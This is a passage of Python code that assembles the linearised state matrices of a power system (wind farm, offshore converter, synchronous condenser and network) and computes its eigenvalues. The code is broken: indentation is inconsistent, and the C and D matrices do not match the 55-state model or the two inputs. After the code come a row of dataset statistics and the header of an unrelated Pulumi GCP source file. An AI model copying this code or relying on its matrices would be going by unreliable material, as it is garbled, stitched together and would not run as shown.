vscy / (gpr.Tm * np.sqrt(vscx ** 2 + vscy ** 2)), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (-wf.Kpc - wf.Rt) / wf.Lt, 0,
npr.wn * wf.Kic / wf.Lt, 0, npr.wn / wf.Lt, 0, npr.wn * (
vwfx * np.sin(thetaw) - vwfy * np.cos(thetaw) - wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * (
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw))) / wf.Lt,
-npr.wn * wf.Ki_pll * wf.Kpc * wf.Kpf * wf.Kpp / wf.Lt, npr.wn * wf.Kif * wf.Kpc * wf.Kpp / wf.Lt,
npr.wn * wf.Kip * wf.Kpc / wf.Lt, 0, -npr.wn * wf.Kpc * wf.Kpp / wf.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * np.sin(thetaw) - np.cos(thetaw)) / wf.Lt,
npr.wn * (-wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * np.cos(thetaw) - np.sin(thetaw)) / wf.Lt, 0, 0, 0,
0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (-wf.Kpc - wf.Rt) / wf.Lt, 0,
npr.wn * wf.Kic / wf.Lt, 0, npr.wn / wf.Lt,
npr.wn * (vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / wf.Lt, 0, 0, 0,
npr.wn * wf.Kiq * wf.Kpc / wf.Lt, 0, npr.wn * wf.Kpc * wf.Kpq * wf.Kq / wf.Lt,
npr.wn * wf.Kpc * wf.Kpq * wf.Kv / wf.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * np.sin(thetaw) / wf.Lt, -npr.wn * np.cos(thetaw) / wf.Lt, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0,
-wf.Kp_pll * wf.Kpf * wf.Kpp * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)),
-wf.Ki_pll * wf.Kpf * wf.Kpp, wf.Kif * wf.Kpp, wf.Kip, 0, -wf.Kpp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kp_pll * wf.Kpf * wf.Kpp * np.sin(thetaw),
-wf.Kp_pll * wf.Kpf * wf.Kpp * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kiq, 0, wf.Kpq * wf.Kq,
wf.Kpq * wf.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / wf.Tad, 0,
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, np.cos(thetaw) / wf.Tad, np.sin(thetaw) / wf.Tad, 0, 0, 0, 0,
0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / wf.Tad,
(-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) / wf.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -np.sin(thetaw) / wf.Tad, np.cos(thetaw) / wf.Tad, 0, 0, 0, 0,
0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * wf.Kp_pll * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), npr.wn * wf.Ki_pll, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-npr.wn * wf.Kp_pll * np.sin(thetaw), npr.wn * wf.Kp_pll * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, -np.sin(thetaw), np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-wf.Kp_pll * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), -wf.Ki_pll, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kp_pll * np.sin(thetaw),
-wf.Kp_pll * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-wf.Kp_pll * wf.Kpf * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), -wf.Ki_pll * wf.Kpf, wf.Kif,
0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
wf.Kp_pll * wf.Kpf * np.sin(thetaw), -wf.Kp_pll * wf.Kpf * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kq, wf.Kv, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / wf.Tpm,
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tpm, 0, 0, 0, 0, (
Idw * (-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) + Iqw * (
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw))) / wf.Tpm, 0, 0, 0, 0, -1 / wf.Tpm,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / wf.Tpm,
(Idw * np.sin(thetaw) + Iqw * np.cos(thetaw)) / wf.Tpm, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tpm,
(-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) / wf.Tpm, 0, 0, 0, 0, (
Idw * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) - Iqw * (
-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw))) / wf.Tpm, 0, 0, 0, 0, 0,
-1 / wf.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(-Idw * np.sin(thetaw) - Iqw * np.cos(thetaw)) / wf.Tpm,
(Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / wf.Tpm, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
(-2 * vwfx * np.sin(thetaw) + 2 * vwfy * np.cos(thetaw)) * (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / 2 + (
-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * (
-2 * vwfx * np.cos(thetaw) - 2 * vwfy * np.sin(thetaw)) / 2) / (
wf.Tvm * np.sqrt((-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), 0, 0, 0, 0, 0, 0, -1 / wf.Tvm,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
-(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * np.sin(thetaw) + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) * np.cos(thetaw)) / (wf.Tvm * np.sqrt(
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), (
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * np.cos(thetaw) + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) * np.sin(thetaw)) / (wf.Tvm * np.sqrt(
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (-off.Kpc - off.Rt) / off.Lt, 0, npr.wn * off.Kic / off.Lt, 0, npr.wn / off.Lt, 0,
npr.wn * (-off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * (
-voffx * np.cos(thetao) - voffy * np.sin(thetao)) + voffx * np.sin(
thetao) - voffy * np.cos(thetao)) / off.Lt,
-npr.wn * off.Ki_pll * off.Kpc * off.Kpf * off.Kpp / off.Lt,
npr.wn * off.Kif * off.Kpc * off.Kpp / off.Lt, npr.wn * off.Kip * off.Kpc / off.Lt, 0,
-npr.wn * off.Kpc * off.Kpp / off.Lt, 0, 0,
npr.wn * (off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * np.sin(thetao) - np.cos(thetao)) / off.Lt,
npr.wn * (-off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * np.cos(thetao) - np.sin(thetao)) / off.Lt, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (-off.Kpc - off.Rt) / off.Lt, 0, npr.wn * off.Kic / off.Lt, 0, npr.wn / off.Lt,
npr.wn * (voffx * np.cos(thetao) + voffy * np.sin(thetao)) / off.Lt, 0, 0, 0,
npr.wn * off.Kiq * off.Kpc / off.Lt, 0, npr.wn * off.Kpc * off.Kpq * off.Kq / off.Lt,
npr.wn * off.Kpc * off.Kpq * off.Kv / off.Lt, npr.wn * np.sin(thetao) / off.Lt,
-npr.wn * np.cos(thetao) / off.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0,
-off.Kp_pll * off.Kpf * off.Kpp * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)),
-off.Ki_pll * off.Kpf * off.Kpp, off.Kif * off.Kpp, off.Kip, 0, -off.Kpp, 0, 0,
off.Kp_pll * off.Kpf * off.Kpp * np.sin(thetao), -off.Kp_pll * off.Kpf * off.Kpp * np.cos(thetao), 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0,
0, 0, 0, 0, off.Kiq, 0, off.Kpq * off.Kq, off.Kpq * off.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-1 / off.Tad, 0, (-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tad, 0, 0, 0, 0, 0, 0, 0,
np.cos(thetao) / off.Tad, np.sin(thetao) / off.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-1 / off.Tad, (-voffx * np.cos(thetao) - voffy * np.sin(thetao)) / off.Tad, 0, 0, 0, 0, 0, 0, 0,
-np.sin(thetao) / off.Tad, np.cos(thetao) / off.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Kp_pll * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), npr.wn * off.Ki_pll, 0, 0,
0, 0, 0, 0, -npr.wn * off.Kp_pll * np.sin(thetao), npr.wn * off.Kp_pll * np.cos(thetao), 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-voffx * np.cos(thetao) - voffy * np.sin(thetao), 0, 0, 0, 0, 0, 0, 0, -np.sin(thetao),
np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-off.Kp_pll * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), -off.Ki_pll, 0, 0, 0, 0, 0, 0,
off.Kp_pll * np.sin(thetao), -off.Kp_pll * np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-off.Kp_pll * off.Kpf * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), -off.Ki_pll * off.Kpf,
off.Kif, 0, 0, -1, 0, 0, off.Kp_pll * off.Kpf * np.sin(thetao),
-off.Kp_pll * off.Kpf * np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, off.Kq, off.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(voffx * np.cos(thetao) + voffy * np.sin(thetao)) / off.Tpm,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tpm, 0, 0, 0, 0, (
Ido * (-voffx * np.sin(thetao) + voffy * np.cos(thetao)) + Iqo * (
-voffx * np.cos(thetao) - voffy * np.sin(thetao))) / off.Tpm, 0, 0, 0, 0,
-1 / off.Tpm, 0, 0, (Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / off.Tpm,
(Ido * np.sin(thetao) + Iqo * np.cos(thetao)) / off.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tpm,
(-voffx * np.cos(thetao) - voffy * np.sin(thetao)) / off.Tpm, 0, 0, 0, 0, (
Ido * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)) - Iqo * (
-voffx * np.sin(thetao) + voffy * np.cos(thetao))) / off.Tpm, 0, 0, 0, 0, 0,
-1 / off.Tpm, 0, (-Ido * np.sin(thetao) - Iqo * np.cos(thetao)) / off.Tpm,
(Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / off.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
(-2 * voffx * np.sin(thetao) + 2 * voffy * np.cos(thetao)) * (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) / 2 + (
-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * (
-2 * voffx * np.cos(thetao) - 2 * voffy * np.sin(thetao)) / 2) / (
off.Tvm * np.sqrt((-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), 0, 0, 0, 0, 0, 0,
-1 / off.Tvm, (-(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * np.sin(thetao) + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) * np.cos(thetao)) / (off.Tvm * np.sqrt(
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), (
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * np.cos(thetao) + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) * np.sin(thetao)) / (
off.Tvm * np.sqrt((-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Sn * np.cos(thetao) / (Chub * npr.Sb),
-npr.wn * off.Sn * np.sin(thetao) / (Chub * npr.Sb), 0, 0, 0, 0,
npr.wn * off.Sn * (-Ido * np.sin(thetao) - Iqo * np.cos(thetao)) / (Chub * npr.Sb), 0, 0, 0, 0, 0, 0,
0, 0, npr.wn, 0, 0, 0, 0, 0, 0, -npr.wn / Chub, 0, -npr.wn / Chub, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Sn * np.sin(thetao) / (Chub * npr.Sb),
npr.wn * off.Sn * np.cos(thetao) / (Chub * npr.Sb), 0, 0, 0, 0,
npr.wn * off.Sn * (Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / (Chub * npr.Sb), 0, 0, 0, 0, 0, 0,
0, -npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn / Chub, 0, -npr.wn / Chub, 0, 0],
[gpr.Sn * npr.wn * (-i_dg * np.sin(delta) - i_qg * np.cos(delta)) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0,
0, gpr.Sn * npr.wn * np.cos(delta) / (Csc * npr.Sb),
-gpr.Sn * npr.wn * np.sin(delta) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, npr.wn / Csc, 0, 0, 0, 0, 0],
[gpr.Sn * npr.wn * (i_dg * np.cos(delta) - i_qg * np.sin(delta)) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0,
0, gpr.Sn * npr.wn * np.sin(delta) / (Csc * npr.Sb),
gpr.Sn * npr.wn * np.cos(delta) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0, npr.wn / Csc, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, npr.wn / Ccb, 0, -npr.wn / Ccb, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0, npr.wn / Ccb, 0, -npr.wn / Ccb],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * wf.Sn * np.cos(thetaw) / (Ccb * npr.Sb),
-npr.wn * wf.Sn * np.sin(thetaw) / (Ccb * npr.Sb), 0, 0, 0, 0,
npr.wn * wf.Sn * (-Idw * np.sin(thetaw) - Iqw * np.cos(thetaw)) / (Ccb * npr.Sb), 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, npr.wn / Ccb,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * wf.Sn * np.sin(thetaw) / (Ccb * npr.Sb),
npr.wn * wf.Sn * np.cos(thetaw) / (Ccb * npr.Sb), 0, 0, 0, 0,
npr.wn * wf.Sn * (Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / (Ccb * npr.Sb), 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0, npr.wn / Ccb],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, npr.wn / Ltsc, 0, -npr.wn / Ltsc, 0, 0, 0, 0, 0, -Rtsc * npr.wn / Ltsc, npr.wn,
0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Ltsc, 0, -npr.wn / Ltsc, 0, 0, 0, 0, -npr.wn, -Rtsc * npr.wn / Ltsc,
0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, npr.wn / Ltwf, 0, 0, 0, -npr.wn / Ltwf, 0, 0, 0, 0, 0, -Rtwf * npr.wn / Ltwf,
npr.wn, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Ltwf, 0, 0, 0, -npr.wn / Ltwf, 0, 0, 0, 0, -npr.wn,
-Rtwf * npr.wn / Ltwf, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Lcb, 0, -npr.wn / Lcb, 0, 0, 0, 0, 0, -Rcb * npr.wn / Lcb,
npr.wn],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Lcb, 0, -npr.wn / Lcb, 0, 0, 0, 0, -npr.wn,
-Rcb * npr.wn / Lcb],
])
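    # 55 states in total (matching the 55 rows of B below): 13 machine states,
    # 14 per converter (wf and off) and 14 network states (bus voltages and
    # branch currents); counts inferred from the x0 indexing above.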
B = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[npr.wn * wf.Kpc * wf.Kpp / wf.Lt, 0],
[0, -npr.wn * wf.Kpc * wf.Kpq * wf.Kq / wf.Lt],
[wf.Kpp, 0],
[0, -wf.Kpq * wf.Kq],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 0],
[0, -wf.Kq],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
])
    C = np.zeros((2, 51))  # NB: stale shape for this 55-state model (B above has 55 rows); harmless while Amat = A
D = np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
    Amat = A  # feedthrough correction -B@np.linalg.inv(D)@C left disabled
lambda_1, Phi_1 = np.linalg.eig(Amat)
    lambda_1[np.abs(lambda_1) < 1e-7] = 0  # suppress numerically spurious near-zero eigenvalues
return lambda_1, Amat, A, B, C, D
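# Usage sketch (illustrative, not from the source): x0, u and the parameter
# objects npr, off, wf, gpr are assumed to come from an upstream
# initialisation / power-flow step.
#
#     lam, Amat, A, B, C, D = nswph_linear3(x0, u, npr, off, wf, gpr)
#     print("right-half-plane modes:", lam[lam.real > 0])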
| 58.482204 | 1,112 | 0.388073 | 25,212 | 152,814 | 2.290933 | 0.016579 | 0.229401 | 0.315899 | 0.391627 | 0.95457 | 0.937205 | 0.922575 | 0.911944 | 0.903721 | 0.897903 | 0 | 0.101304 | 0.418051 | 152,814 | 2,612 | 1,113 | 58.504594 | 0.548184 | 0.131539 | 0 | 0.687174 | 0 | 0 | 0.00335 | 0 | 0 | 0 | 0 | 0.001531 | 0 | 1 | 0.009906 | false | 0 | 0.001043 | 0 | 0.020855 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
4a5c4305ac1abee7510d7ae4ee59202a7cdc5436 | 16,682 | py | Python | sdk/python/pulumi_gcp/accesscontextmanager/service_perimeters.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | ["ECL-2.0", "Apache-2.0"] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/accesscontextmanager/service_perimeters.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | ["ECL-2.0", "Apache-2.0"] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/accesscontextmanager/service_perimeters.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | ["ECL-2.0", "Apache-2.0"] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
